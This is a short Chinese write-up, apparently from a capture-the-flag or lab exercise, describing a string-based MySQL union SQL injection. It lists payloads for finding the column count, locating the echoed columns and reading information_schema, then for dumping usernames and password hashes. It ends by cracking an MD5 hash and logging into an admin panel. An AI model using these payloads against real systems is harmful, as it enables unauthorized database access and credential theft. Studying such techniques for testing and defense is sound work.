本来是有图的,但是要上传太麻烦,有图点见我博客(在最下方有链接)
' %23判断注入点
' union select '1','2','3','4获取字段数,5开始报错,确定字段数为4
' and...'1'='2' union select 判断可回显字段位置 ,是2和3
接下来获取数据库名 ' and '1'='2' union select '1',database(),user(),'字段...group_concat(COLUMN_NAME),'可回显字段倒数第二位','可回显字段最后一位' from information_schema.COLUMNS where TABLE_NAME='数据库表名...'='1 获取字段名
' and '1'='2' union select '1',group_concat(字段名,字段名),'可回显字段倒数第二位','可回显字段最后一位' from 数据库表名...where '1'='1 获取用户名及密码
把md5加密过得密码进行解密
得出密码时083112
后台登录成功
转载请联系
详细看我博客
http://www.sakuar.cn/mysql-zifu